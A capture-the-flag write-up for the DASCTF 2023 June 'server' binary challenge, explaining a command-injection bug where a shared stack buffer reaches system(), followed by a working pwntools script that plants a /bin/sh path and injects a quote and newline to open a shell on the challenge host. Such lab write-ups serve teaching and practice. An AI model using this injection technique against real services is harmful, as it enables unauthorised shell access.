DASCTF 2023六月挑战赛 二进制专项 server
Both menu handlers reuse the same stack slot at rbp-0x40. The bug is that user input reaches system(): the routine at 0x14DA filters characters in the option-2 input, but because the buffer is shared, data left behind by the earlier option-1 input (the admin key) is still in the slot. The second input only has to close the quoted argument and end with \n, which the shell treats as a command separator, so the residual buffer contents run as a separate command.
from pwn import *
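context(arch='amd64', os='linux', log_level='debug')
file_name = './pwn_7'


def li(x):
    """Print ``x`` wrapped in an SGR bold + 256-colour (index 214) foreground escape."""
    print('\x1b[01;38;5;214m' + str(x) + '\x1b[0m')


def ll(x):
    """Print ``x`` wrapped in an SGR bold + 256-colour (index 1) foreground escape."""
    print('\x1b[01;38;5;1m' + str(x) + '\x1b[0m')


context.terminal = ['tmux', 'splitw', '-h']
# NOTE: the flag name is misleading -- `debug = 1` selects the REMOTE target
# (the buuoj node), while 0 runs ./pwn_7 locally under pwntools. Set it to 0
# when you want to single-step the exploit (e.g. attach gdb via dbg()).
debug = 1
if debug:
    r = remote('node4.buuoj.cn', 25959)
else:
    r = process(file_name)
elf = ELF(file_name)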
def dbg():
    """Attach gdb to the active tube, opening it in the tmux split set in context.terminal."""
    target = r
    gdb.attach(target)
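def dbgg():
    """Block until Enter is pressed, giving time to attach a debugger by hand.

    The original called ``raw_input()``, which exists only in Python 2 and
    raises NameError under Python 3; ``input()`` is the equivalent there.
    The typed text is discarded.
    """
    input()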
# Prompt the target prints before reading a menu choice; the helpers below
# synchronise on it with sendlineafter().
menu = "Your choice >> "
def diff(key):
    """Menu option 1: submit ``key`` at the "key of admin" prompt.

    In this exploit it is the first write into the stack buffer that the
    option-2 handler reuses (see the note at the top of the file).
    """
    option = '1'
    prompt = 'Please input the key of admin : '
    r.sendlineafter(menu, option)
    r.sendlineafter(prompt, key)
def sys(p):
    """Menu option 2: send payload ``p`` at the "username to add" prompt.

    Per the note at the top of the file this input reaches system() after a
    character filter, so the payload only needs to close the quoted argument
    and add a newline. NOTE(review): the name shadows the ``sys`` module if
    ``from pwn import *`` re-exports it; kept because the call site uses it.
    """
    option = '2'
    prompt = 'Please input the username to add : \n'
    r.sendlineafter(menu, option)
    r.sendlineafter(prompt, p)
# --- exploit ----------------------------------------------------------------
# Pause so a debugger can be attached by hand; press Enter to continue.
dbgg()
# Option 1: leave a path to /bin/sh in the shared rbp-0x40 buffer. The
# "../.." prefix climbs to the filesystem root as long as the server's cwd is
# at most six levels deep; relies on the key prompt accepting '.' and '/'.
diff('../../../../../..//bin/sh')
# Option 2: the quote presumably closes the quoted argument the server builds
# around the username, and the newline ends that shell command so the
# residual buffer contents run as the next one (see the note at the top).
p1 = b"'\n"
sys(p1)
r.interactive()